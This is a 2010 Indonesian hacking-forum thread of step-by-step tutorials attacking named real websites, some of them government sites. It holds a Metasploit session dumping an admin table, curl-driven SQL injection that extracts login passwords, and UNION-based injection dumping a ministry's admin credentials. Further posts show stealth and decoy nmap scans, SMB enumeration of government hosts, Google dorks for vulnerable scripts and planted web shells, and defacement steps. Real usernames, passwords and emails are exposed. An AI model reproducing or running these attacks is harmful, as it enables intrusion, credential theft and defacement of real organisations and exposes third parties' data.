http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx

msf auxiliary(mssql_sql) > set RHOST 202.190.167.124
RHOST => 202.190.167.124
msf auxiliary(mssql_sql) > set RPORT 1434
RPORT => 1434
msf auxiliary(mssql_sql) > set USERNAME leno2
USERNAME => leno2
msf auxiliary(mssql_sql) > set PASSWORD leno2login
PASSWORD => leno2login
msf auxiliary(mssql_sql) > set SQL "sp_tables"
SQL => sp_tables
msf auxiliary(mssql_sql) > run

bersambung...

void

06-17-2010, 08:16 PM

SQL Query: sp_tables
[-] unsupported token: 169
[-] unsupported token: 8
[-] unsupported token: 0
[-] unsupported token: 4
[-] unsupported token: 0
[-] unsupported token: 1
[-] unsupported token: 0
[-] unsupported token: 2
[-] unsupported token: 0
[-] unsupported token: 3
[-] unsupported token: 0

TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE REMARKS
--------------- ----------- ---------- ---------- -------
LENO2 dbo dtproperties TABLE
LENO2 dbo sysdiagrams TABLE
LENO2 dbo TBL_ADMIN TABLE
LENO2 dbo TBL_ADMIN_FUNCTION TABLE
LENO2 dbo TBL_ADMIN_LOG TABLE
LENO2 dbo TBL_BANNER TABLE
LENO2 dbo TBL_BC TABLE
LENO2 dbo TBL_BC_CONTENT TABLE
LENO2 dbo TBL_BC_CONTENT_DL TABLE
LENO2 dbo TBL_BC_CONTENT_TYPE TABLE
LENO2 dbo TBL_CAT TABLE
LENO2 dbo TBL_CONTENT TABLE
LENO2 dbo TBL_CONTENT_DL TABLE
LENO2 dbo TBL_CONTENT_OTHER TABLE
LENO2 dbo TBL_COUNTRY TABLE
LENO2 dbo TBL_CUSTOM_SETTING TABLE
LENO2 dbo TBL_ECAT TABLE
LENO2 dbo TBL_ECAT_IMG TABLE
LENO2 dbo TBL_FUNCTION TABLE
LENO2 dbo TBL_INDEX_BANNER TABLE
LENO2 dbo TBL_JOB_APP TABLE
LENO2 dbo TBL_JOB_APP2 TABLE
LENO2 dbo TBL_JOB_APP2_CURRICULAR TABLE
LENO2 dbo TBL_JOB_APP2_EDU TABLE
LENO2 dbo TBL_JOB_APP2_EXAM TABLE
LENO2 dbo TBL_JOB_APP2_FAMILY TABLE
LENO2 dbo TBL_JOB_APP2_FAMILY_CHILDREN TABLE
LENO2 dbo TBL_JOB_APP2_FAMILY_SIBLING TABLE
LENO2 dbo TBL_JOB_APP2_LANGUAGE TABLE
LENO2 dbo TBL_JOB_APP2_OTHER TABLE
LENO2 dbo TBL_JOB_APP2_SKILL TABLE
LENO2 dbo TBL_JOB_APP2_TRAINING TABLE
LENO2 dbo TBL_JOB_APP2_WORKEXP TABLE
LENO2 dbo TBL_JOB_POST TABLE
LENO2 dbo TBL_MAIL TABLE
LENO2 dbo TBL_MAIL_MEMBER TABLE
LENO2 dbo TBL_MAIL_MEMBER_GROUP TABLE
LENO2 dbo TBL_STATE TABLE
LENO2 dbo TBL_STATUS TABLE
LENO2 dbo TBL_STOCKIST TABLE
LENO2 dbo TBL_STOCKIST_TYPE TABLE
LENO2 dbo TBL_TEST TABLE
LENO2 dbo zSVK1 TABLE
LENO2 INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW
LENO2 INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW
LENO2 INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW
LENO2 INFORMATION_SCHEMA COLUMNS VIEW
LENO2 INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW
LENO2 INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW
LENO2 INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW
LENO2 INFORMATION_SCHEMA DOMAINS VIEW
LENO2 INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW
LENO2 INFORMATION_SCHEMA PARAMETERS VIEW
LENO2 INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW
LENO2 INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW
LENO2 INFORMATION_SCHEMA ROUTINES VIEW
LENO2 INFORMATION_SCHEMA SCHEMATA VIEW
LENO2 INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW
LENO2 INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW
LENO2 INFORMATION_SCHEMA TABLES VIEW
LENO2 INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW
LENO2 INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW
LENO2 INFORMATION_SCHEMA VIEWS VIEW

--snip--

Auxiliary module execution completed
msf auxiliary(mssql_sql) > set SQL "select * from TBL_ADMIN"
SQL => select * from TBL_ADMIN
msf auxiliary(mssql_sql) > run

SQL Query: select * from TBL_ADMIN

Row Count: 7 (Status: 16 Command: 193)

--snip--

admin_id username password user_type title full_name mobile_no email status created_by
-------- -------- -------- --------- ----- --------- --------- ----- ------ ----------
3 kong02 123123 AU Mr. Kong 02 kong02@kong.com S 1
4 kong03 123123 AU Mr. Kong 03 kong03@kong.com S 1
5 BD YHO333 AU Mr. HY Ong hyong@leno2u.com A 1
6 Marcom psn1675 AU Ms. SN Phang snphang@leno2u.com A 1
7 HR wsl9235 AU Ms. Shirley Woo shirleywoo@leno2u.com A 1

Auxiliary module execution completed
msf auxiliary(mssql_sql) >

nah begitulah kira2 kejadiannya. btw, tools yang digunakan adalah: curl, nmap dan metasploit :)
maaf kalau kurang bagus, maklum masih pemula :shy:

Savoxit

06-20-2010, 02:09 PM

Wah....tutor gratis.....pelajari dulu ah...heheg...:)

widnyana putra

06-27-2010, 03:09 PM

wahahahahaa... keluar juga taringnya om void. :D

om, request tutorial metasploit-nya yak. :) :pisangdance:

nubitol

08-04-2010, 11:03 PM

weh yang posting tutorial banyak banget, para senior semua yang komen. :shy:

void

08-06-2010, 08:12 AM

wahahahahaa... keluar juga taringnya om void. :D

om, request tutorial metasploit-nya yak. :) :pisangdance:
wkwkwkwk... emgnya saya dracula , pake taring :o_o: :D
wookee bro, nanti saya usahakan buat tutorial soal metasploit :)

weh yang posting tutorial banyak banget, para senior semua yang komen. :shy:
weleh, keknya di sini masih pada pemula semua, kecuali om Anvie, om lynxluna sama om xerion... :ngacir:

btw, ini ada tutorial lagi :)

-----

Disclaimer
Hanya untuk tujuan pembelajaran. Saya tidak bertanggungjawab atas penggunaan maupun penyalahgunaan posting ini. Use at your own risk.

Langkah-langkah

Pertama kita cari field yang ada di databasenya. kita menggunakan celah pada form yang ada di halaman login admin. pertama kita masukkan username a' having 1=1-- dan password a

$ curl -s -d "username=a'%20having%201=1--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 't_user.us_seq' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/admin/dologin.asp, line 7

Dari snippet di atas, kita mendapatkan field pertama adalah us_seq pada tabel t_user. Selanjutnya kita menggunakan username a' group by t_user.us_seq having 1=1-- dan password kita isi dengan a

$ curl -s -d "username=a'%$ curl -s -d "username=a'%20group%20by%20t_user.us_seq%20having% 201=1--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 't_user.us_password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/admin/dologin.asp, line 7

Field ke-2 sudah kita peroleh, yaitu us_password. Giliran field selanjutnya, kita menggunakan username a' group by t_user.us_seq,t_user.us_password having 1=1-- dan password a

$ curl -s -d "username=a'%20group%20by%20t_user.us_seq,t_user.us _password%20having%201=1--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 't_user.us_level' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/admin/dologin.asp, line 7

Field ke-3 adalah us_level. Selanjutnya kita gunakan username a' group by t_user.us_seq,t_user.us_password,t_user.us_level having 1=1-- dan password a

$ curl -s -d "username=a'%20group%20by%20t_user.us_seq,t_user.us _password,t_user.us_level%20having%201=1--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 't_user.us_active' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/admin/dologin.asp, line 7

Field ke-4 adalah us_active. Lanjut lagi, kita menggunakan username a' group by t_user.us_seq,t_user.us_password,t_user.us_level,t _user.us_active having 1=1-- dan password a

$ curl -s -d "username=a'%20group%20by%20t_user.us_seq,t_user.us _password,t_user.us_level,t_user.us_active%20havin g%201=1--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp
<script language="javascript">alert("Invalid User Name");history.back();</script>

Nah, muncul error. Berarti ada 4 field yaitu us_seq, us_password, us_level dan us_active

Sekarang coba kita iseng2 cek versi databasenya. Masukkan username a' union select @@version,1,2,3-- dan password a

$ curl -s -d "username=a'%20union%20select%20@@version,1,2,3--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
' to a column of data type int.

/admin/dologin.asp, line 7

Ok, sekarang kita cari passwordnya satu persatu. Kita gunakan username a' union select min(us_password),1,2,3 from t_user where us_password > 'a'-- dan password diisi a

$ curl -s -d "username=a'%20union%20select%20min(us_password),1, 2,3%20from%20t_user%20where%20us_password%20>%20'a'--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'arw240284' to a column of data type int.

/admin/dologin.asp, line 7

Kita dapatkan password pertama arw240284. Kita lanjutkan terus dengan mengganti bagian where us_password > 'a' dengan 'b', 'c', dst

$ curl -s -d "username=a'%20union%20select%20min(us_password),1, 2,3%20from%20t_user%20where%20us_password%20>%20'n'--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'nancy' to a column of data type int.

/admin/dologin.asp, line 7

Nah, dari snippet di atas bisa terlihat passwordnya nancy. Coba kita login dengan username nancy dan password nancy, maka hasilnya adalah:

http://i34.tinypic.com/51x2me.png

btw, sepertinya situs CSIS sudah di-pwn oleh orang Russia. coba perhatikan halaman login, dibagian bawah terdapat kode ini:

$ curl -s http://www.csis.or.id/admin/ | tail -2
<script type="text/javascript" src="http://obscurewax.ru/Username.js"></script>


dan kalau situsnya dicek

$ whois obscurewax.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain: OBSCUREWAX.RU
nserver: ns1.instantdnsserver.com.
nserver: ns2.instantdnsserver.com.
nserver: ns3.instantdnsserver.com.
nserver: ns4.instantdnsserver.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 487 2312353
e-mail: vibes@freenetbox.ru
registrar: NAUNET-REG-RIPN
created: 2010.07.30
paid-till: 2011.07.30
source: TCI

Last updated on 2010.08.06 04:35:46 MSK/MSD

whew...
btw, sekian dulu tutorial singkat ini semoga bermanfaat.

nubitol

08-06-2010, 11:02 PM

wkwkwkwk... emgnya saya dracula , pake taring :o_o: :D
wookee bro, nanti saya usahakan buat tutorial soal metasploit :)

weleh, keknya di sini masih pada pemula semua, kecuali om Anvie, om lynxluna sama om xerion... :ngacir:

btw, ini ada tutorial lagi :)

-----

Disclaimer
Hanya untuk tujuan pembelajaran. Saya tidak bertanggungjawab atas penggunaan maupun penyalahgunaan posting ini. Use at your own risk.

Langkah-langkah

Pertama kita cari field yang ada di databasenya. kita menggunakan celah pada form yang ada di halaman login admin. pertama kita masukkan username a' having 1=1-- dan password a

$ curl -s -d "username=a'%20having%201=1--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 't_user.us_seq' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/admin/dologin.asp, line 7

Dari snippet di atas, kita mendapatkan field pertama adalah us_seq pada tabel t_user. Selanjutnya kita menggunakan username a' group by t_user.us_seq having 1=1-- dan password kita isi dengan a

$ curl -s -d "username=a'%$ curl -s -d "username=a'%20group%20by%20t_user.us_seq%20having% 201=1--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 't_user.us_password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/admin/dologin.asp, line 7

Field ke-2 sudah kita peroleh, yaitu us_password. Giliran field selanjutnya, kita menggunakan username a' group by t_user.us_seq,t_user.us_password having 1=1-- dan password a

$ curl -s -d "username=a'%20group%20by%20t_user.us_seq,t_user.us _password%20having%201=1--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 't_user.us_level' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/admin/dologin.asp, line 7

Field ke-3 adalah us_level. Selanjutnya kita gunakan username a' group by t_user.us_seq,t_user.us_password,t_user.us_level having 1=1-- dan password a

$ curl -s -d "username=a'%20group%20by%20t_user.us_seq,t_user.us _password,t_user.us_level%20having%201=1--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 't_user.us_active' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/admin/dologin.asp, line 7

Field ke-4 adalah us_active. Lanjut lagi, kita menggunakan username a' group by t_user.us_seq,t_user.us_password,t_user.us_level,t _user.us_active having 1=1-- dan password a

$ curl -s -d "username=a'%20group%20by%20t_user.us_seq,t_user.us _password,t_user.us_level,t_user.us_active%20havin g%201=1--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp
<script language="javascript">alert("Invalid User Name");history.back();</script>

Nah, muncul error. Berarti ada 4 field yaitu us_seq, us_password, us_level dan us_active
Sekarang coba kita iseng2 cek versi databasenya. Masukkan username a' union select @@version,1,2,3-- dan password a

$ curl -s -d "username=a'%20union%20select%20@@version,1,2,3--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
' to a column of data type int.

/admin/dologin.asp, line 7

Ok, sekarang kita cari passwordnya satu persatu. Kita gunakan username a' union select min(us_password),1,2,3 from t_user where us_password > 'a'-- dan password diisi a

$ curl -s -d "username=a'%20union%20select%20min(us_password),1, 2,3%20from%20t_user%20where%20us_password%20>%20'a'--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'arw240284' to a column of data type int.

/admin/dologin.asp, line 7

Kita dapatkan password pertama arw240284. Kita lanjutkan terus dengan mengganti bagian where us_password > 'a' dengan 'b', 'c', dst

$ curl -s -d "username=a'%20union%20select%20min(us_password),1, 2,3%20from%20t_user%20where%20us_password%20>%20'n'--&password=a&Button=Login" http://www.csis.or.id/admin/dologin.asp

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'nancy' to a column of data type int.

/admin/dologin.asp, line 7

Nah, dari snippet di atas bisa terlihat passwordnya nancy. Coba kita login dengan username nancy dan password nancy, maka hasilnya adalah:

http://i34.tinypic.com/51x2me.png

btw, sepertinya situs CSIS sudah di-pwn oleh orang Russia. coba perhatikan halaman login, dibagian bawah terdapat kode ini:

$ curl -s http://www.csis.or.id/admin/ | tail -2
<script type="text/javascript" src="http://obscurewax.ru/Username.js"></script>

dan kalau situsnya dicek

$ whois obscurewax.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain: OBSCUREWAX.RU
nserver: ns1.instantdnsserver.com.
nserver: ns2.instantdnsserver.com.
nserver: ns3.instantdnsserver.com.
nserver: ns4.instantdnsserver.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 487 2312353
e-mail: vibes@freenetbox.ru
registrar: NAUNET-REG-RIPN
created: 2010.07.30
paid-till: 2011.07.30
source: TCI

Last updated on 2010.08.06 04:35:46 MSK/MSD
whew...
btw, sekian dulu tutorial singkat ini semoga bermanfaat.

masih aja ane gak mudeng gan. :shy:

galang_cha0s

08-09-2010, 11:44 AM

tambah keren aja neh forum..
\m/

belajar dulu om B)

widnyana putra

08-11-2010, 11:21 AM

haahhaaa... ansav gituloh.. :D :D

ditempat laen mana ada. :))

fuckeeh

08-11-2010, 12:45 PM

ajarin make nmap donk gan,.., :D

void

08-12-2010, 04:45 AM

untuk nmap, biasanya saya pakai switch/options berikut ini
-sS -sV -PN -F -T4 -Dwww.google.com -oN <output_log> --traceroute
keterangannya sbb:

-sS artinya melakukan syn stealth scan
-sV artinya mencari tahu versi service dari port yang terbuka
-PN artinya kita tidak melakukan ping untuk menentukan apakah target online atau tidak.
-F artinya kita hanya men-scan port2 penting saja, jadi lebih cepat
-T artinya kita melakukan scanning secara cepat atau lambat. semakin besar nilainya, maka semakin cepat pula scanning dilakukan. rangenya dari 0 sampai 5
-D artinya kita melakukan decoy agar tidak mudah terdeteksi asal dari proses scan yg kita lakukan.
-oN artinya kita me-log aktivitas scanning ke file dalam format normal. selain itu tersedia jg format XML, grepable dan format skript kiddie.
--traceroute untuk mengetahui jalur yg dilewati menuju ke target.

# nmap -sS -sV -PN -F -T4 -Dwww.google.co.id --traceroute www.deptan.go.id

Starting Nmap 5.21 ( http://nmap.org ) at 2010-08-12 03:40 WIT
Nmap scan report for www.deptan.go.id (203.190.36.30)
Host is up (0.12s latency).
Not shown: 98 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
80/tcp open http?

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 898.11 ms x.x.x.x
2 899.01 ms x.x.x.x
3 898.17 ms x.x.x.x
4 896.91 ms deptan.openixp.net (218.100.27.40)
5 897.61 ms 192.168.254.254
6 ... 30

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.24 seconds

selain itu nmap juga dilengkapi script, dan contoh penggunaannya seperti ini:

# nmap -PN --script smb-enum-shares.nse -p 139 sdmaparatur.menpan.go.id

Starting Nmap 5.21 ( http://nmap.org ) at 2010-08-12 03:50 WIT
NSE: Script Scanning completed.
Nmap scan report for sdmaparatur.menpan.go.id (203.57.24.12)
Host is up (0.095s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn

Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| Current user ('guest') access: <none>
| C$
| Anonymous access: <none>
| Current user ('guest') access: <none>
| D$
| Anonymous access: <none>
| Current user ('guest') access: <none>
| Dmp
| Anonymous access: <none>
| Current user ('guest') access: READ/WRITE
| IPC$
| Anonymous access: READ <not a file share>
| Current user ('guest') access: READ <not a file share>
| htdocs
| Anonymous access: <none>
| Current user ('guest') access: READ/WRITE
| mysql
| Anonymous access: <none>
|_ Current user ('guest') access: READ/WRITE

Nmap done: 1 IP address (1 host up) scanned in 39.56 seconds
# nmap -PN --script smb-enum-users.nse -p 139 sdmaparatur.menpan.go.id

Starting Nmap 5.21 ( http://nmap.org ) at 2010-08-12 03:53 WIT
NSE: Script Scanning completed.
Nmap scan report for sdmaparatur.menpan.go.id (203.57.24.12)
Host is up (0.096s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn

Host script results:
| smb-enum-users:
| TPKHUSUS10\Administrator (RID: 500)
| TPKHUSUS10\apache2triad (RID: 1003)
| TPKHUSUS10\Guest (RID: 501)
| TPKHUSUS10\HelpAssistant (RID: 1000)
|_ TPKHUSUS10\SUPPORT_388945a0 (RID: 1002)

Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds
# nmap -PN --script nbstat.nse -p 139 sdmaparatur.menpan.go.id

Starting Nmap 5.21 ( http://nmap.org ) at 2010-08-12 03:54 WIT
NSE: Script Scanning completed.
Nmap scan report for sdmaparatur.menpan.go.id (203.57.24.12)
Host is up (0.13s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn

Host script results:
| nbstat:
| NetBIOS name: TPKHUSUS10, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:76:8a:83:59
| Names
| TPKHUSUS10<00> Flags: <unique><active>
| EVALAP<00> Flags: <group><active>
| TPKHUSUS10<20> Flags: <unique><active>
| EVALAP<1e> Flags: <group><active>
| EVALAP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>

Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds

void

08-19-2010, 01:20 AM

kali ini kita akan membahas SQL injection di salah satu situs pemeritah yg kurang terawat. pertama, kita uji apakah situsnya rawan terhadap SQL injection

http://www.deptan.go.id/pusdatin/print.php?id=96'

error yg muncul adalah sbb:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/deptan/pusdatin/print.php on line 28

selanjutnya kita akan mencari jumlah field pada query, kita menggunakan query order by seperti ini:

http://www.deptan.go.id/pusdatin/print.php?id=96+order+by+8--

ternyata masih error, jadi kita ubah menjadi nilai yg lebih kecil yaitu 7 seperti ini

http://www.deptan.go.id/pusdatin/print.php?id=96+order+by+7--

hasilnya tidak error, berarti ada 7 field yang digunakan pada query. selanjutnya seperti biasa, kita mencari magic number.

http://www.deptan.go.id/pusdatin/print.php?id=-96+union+select+0,1,2,3,4,5,6--

ok, ada 2 magic number yaitu 3 dan 5. kali ini kita akan gunakan magic number 5 untuk mencari user/database/version

http://www.deptan.go.id/pusdatin/print.php?id=-96+union+select+0,1,2,3,4,concat(user(),0x3a,datab ase(),0x3a,version()),6--

hasilnya adalah:

admindeptan@localhost:pusdatin:5.0.45-standard-log

sekarang mari kita cari database yg bisa diakses oleh user ini menggunakan query berikut

http://www.deptan.go.id/pusdatin/print.php?id=-96+union+select+0,1,2,3,4,group_concat(schema_name ),6+from+information_schema.schemata+where+schema_ name+!=+database()--

hasilnya adalah *edited, biar mudah dibaca*

information_schema
berita2
biro_hukmas
biro_oke
biro_oke1
birokepeg
birokp
db_bdd
db_tts
deptan
feati
feati_forum
guestbook
jurluhnak
kiosk_j
kioskplus
kln
layanan
layanan1
lombaweb
pembiayaan
setjen
wap

sekarang kita akan akan mencari isi dari database wap. pertama, kita mencari apa saja tabel pada database wap dengan menggunakan query

http://www.deptan.go.id/pusdatin/print.php?id=-96+union+select+0,1,2,3,4,group_concat(table_name) ,6+from+information_schema.tables+where+table_sche ma+=+0x776170--

hasilnya adalah *edited*

wps_about
wps_components
wps_contact
wps_dateformat
wps_emulator
wps_guestbook
wps_items
wps_links
wps_menu
wps_poll
wps_poll_data
wps_referers
wps_sections
wps_site
wps_statistics
wps_timediff
wps_users

ok, sekarang tabel yg menjadi sasaran kita adalah tabel wps_users. kita akan mencari kolom yg ada di sana dengan menggunakan query berikut

http://www.deptan.go.id/pusdatin/print.php?id=-96+union+select+0,1,2,3,4,group_concat(column_name ),6+from+information_schema.columns+where+table_na me+=+0x7770735f7573657273--

hasilnya adalah nama kolom yaitu:

id
user
password
userlevel

ok, nama database, tabel dan kolom sudah diperoleh. sekarang waktunya mencari isi dari tabel wps_users

http://www.deptan.go.id/pusdatin/print.php?id=-96+union+select+0,1,2,3,4,group_concat(id,0x3a,use r,0x3a,password,0x3a,userlevel),6+from+wap.wps_use rs--

hasilnya adalah:

+----+----------+----------+-----------+
| id | user | password | userlevel |
+----+----------+----------+-----------+
| 2 | demo | demo | 1 |
| 4 | sysadmin | pusd4t1n | 2 |
| 5 | notexist | iSee | 2 |
+----+----------+----------+-----------+

terakhir, kita akan login pada situs wap deptan dengan menggunakan salah satu user/password di atas pada url berikut ini:

http://www.deptan.go.id/wap/admin/

masukkan username sysadmin dan password pusd4t1n maka kita akan masuk ke dalam admin panel situs wap deptan. btw, setelah menelusuri dengan google akhirnya menemukan database yang di dump:

http://www.deptan.go.id/biro_ok/admin/pengumuman/wap.sql

widnyana putra

08-19-2010, 02:43 PM

kok deptan melulu korbannya? :pp

jangn jangn om void admin deptan yak? =))

void

08-19-2010, 04:20 PM

kok deptan melulu korbannya? :pp

jangn jangn om void admin deptan yak? =))
keknya itu situsnya dioutsource bro, cekidot:

$ curl -s http://www.deptan.go.id/bpsdmp/admin/file/log_kerjaan_web_deptan.txt | grep 'hack'
* Web deptan di hack (deface) sama komeng, juga portaltan dan portalluh, untuk yang
portal di hack sama penggemar blacksabath;
* Situs web deptan kena hack lagi sama orang yang frustasi ingin diterima di Departemen Pertanian;
$

widnyana putra

08-22-2010, 11:37 AM

wew... outsource itu maksude piye kang?

M2R

08-22-2010, 06:28 PM

wew... outsource itu maksude piye kang?

udah banyak yg meninggalkan 'jejak' bro :D

Jhony Gudhel

09-05-2010, 01:51 PM

hadow..saia msh newbie bgt neh..
baca ttg deface mlh pucink...:D
pd hebat neh om2 semua...

dewaphobia

09-15-2010, 12:53 PM

www.deptan.go.id (http://www.deptan.go.id) udah gak pernah di perbaiki lagi ya?

dewaphobia

09-15-2010, 01:28 PM

Teknik bagi pemula, cuma copasdit aja kok :shy:
tujuannya cuma pembelajaran ya, maaf kalo masih newbie
:worship:

Dengan memanfaatkan dork google, kita dapat mencari kelemahan suatu website dengan cepat

buka google.com

cari dengan keyword allinurl:"/cgi-bin/ourspace/"

buka target
misalkan:

http://www.*korban*.com/cgibin/ourspace//login.cgi?abcdefghijklmno
trus edit deh:
/login.cgi diganti dengan newswire/uploadmedia.cgi

jadi gini:

http://www.*korban*.com/cgibin/ourspace/newswire/uploadmedia.cgi?abcdefghijklmno
nah bisa upload di situ deh, misalkan hasil_suntik.html

nih hasil suntikan (http://www.freewhiz.com/latinos/ourspaceimages/newswiremedia///idols.htm) yang ngasih tutor

maaf ya buat para sesepuh, ane cuma jajal aja kok, kali aja tutornya bener :D

widnyana putra

09-15-2010, 11:22 PM

masih working kok, tapi rada susah nyari targetnya. kenapa ga sekalian praktek aja om? :p

ini yg ga berhasil http://www.mysitespot.net/cgi-bin/ourspace/newswire/uploadmedia.cgi?command=getprofile&who=Admin
http://www.2coolcode.com//cgi-bin/ourspace//newswire/uploadmedia.cgi
lagi males googling om, ntaran aja deh. modem lelet minta ampun

oya ini ada trik lama, tapi masih bisa jalan kok.

Ketik di google
inurl:/forums.asp?iFor=

Pilih target...
Contoh target
http://www.portugalweb.net/forum/forums.asp?iFor=23

Hapus angka dibelakang =
Hingga menjadi ini
http://www.portugalweb.net/forum/forums.asp?iFor

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users

Hingga menjadi seperti ini
http://www.portugalweb.net/forum/forums....from+users

Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya

Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default

Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS" dan masukkan apa yg ada di benak anda. :)) kalo mau full screen, pake tag layer aja atur ukurannya lebar 1500px, tinggi 1200px ato terserah deh. =))

moga ngerti yak. server yg saya jadiin contoh udah mati, silakan cari target lain. jangan malas guugling

dewaphobia

09-16-2010, 08:18 AM

indahnya berbagi :shy:
ini bug dari gugel bukan sih?

widnyana putra

09-17-2010, 03:41 PM

err,, bukan. itu bug dari script forumnya om. nyarinya via gugel.

om void mana neh, kok ga nongol nongol lagi. -_-

dewaphobia

09-20-2010, 10:29 AM

tapi bukannya gugel harus memberikan privasi buat pemilik website ? kalo gini kan malah bikin nyubi website bisa ketar ketir :D

:(

dewaphobia

09-21-2010, 09:09 AM

apakah error semacam ini bisa di hack ? :shy:

_http://majalahgratis.web.id/tag/fungsi-networkacc-blackberry
_http://majalahgratis.web.id/wp-content/plugins/stupidpie/stupidpie.php

void

09-21-2010, 01:45 PM

err,, bukan. itu bug dari script forumnya om. nyarinya via gugel.

om void mana neh, kok ga nongol nongol lagi. -_-

hadir bro. maaf akhir2 ini lagi banyak kegiatan, jadi blm sempat posting lagi bro :(

tapi bukannya gugel harus memberikan privasi buat pemilik website ? kalo gini kan malah bikin nyubi website bisa ketar ketir :D

:(

maksudnya privacy gimana bro? itu sebenernya google hanya nge-index aja (cmiiw), jadi bukan nge-index bug nya secara langsung. contoh, script b374k yang diinjeksi ke situs, mudah untuk didapat klo lewat google, jika yg nge-inject ga modifikasi scriptnya :)

intitle:"b374k m1n1"

widnyana putra

09-21-2010, 07:48 PM

xixixix..
ga cuma becak mini om, C99, locus, ato shellscript lainnya juga bertebaran kok om. pinter2 nyari aja.

oiya, studi kasus pake nc dong om.
ajarin om. ini linknya _http://www.winfabags.com/aboutus.php?y=/home/aqualeon/&x=netsploit

^^.v

09-22-2010, 06:17 PM

ini dapet dari echo
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
download c99.php
download c99.php
download c99.php
inurl:c99.php
inurl:c99.php
allinurl: c99.php
inurl:c99.php
allinurl: c99.php
inurl:"/c99.php"
allinurl: c99.php
